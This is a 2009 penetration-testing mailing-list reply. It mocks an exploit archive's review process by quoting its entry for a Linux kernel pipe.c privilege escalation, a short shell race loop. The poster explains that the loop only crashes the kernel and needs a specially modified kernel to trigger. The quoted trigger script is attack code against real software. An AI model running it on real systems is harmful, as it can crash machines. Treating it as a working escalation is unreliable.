Penetration Testing mailing list archives
Re: Possible Milw0rm replacement?
From: Siim Põder <siim () p6drad-teel net>
Date: Tue, 17 Nov 2009 15:04:41 +0200
Hi

Tom Green wrote:
> http://exploits.offensive-security.com/

Just that their review process seems to suck?

"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability":

    while : ; do
        { echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
        PID=$!
        OUT=$(ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; } )
        OUT="${OUT%% *}"
        DELAY=$((RANDOM * 1000 / 32768))
        usleep $((DELAY * 1000 + RANDOM % 1000 ))
        echo n > /proc/$OUT/fd/1    # Trigger defect
    done

Not only would that just OOPS the kernel and kill the process, it also needs a MODIFIED kernel (sleep(n) added to) to even trigger that. The discoverer himself made that note when he posted the shellscript.

So on first glance it leaves a very professional impression of the site ;)

Siim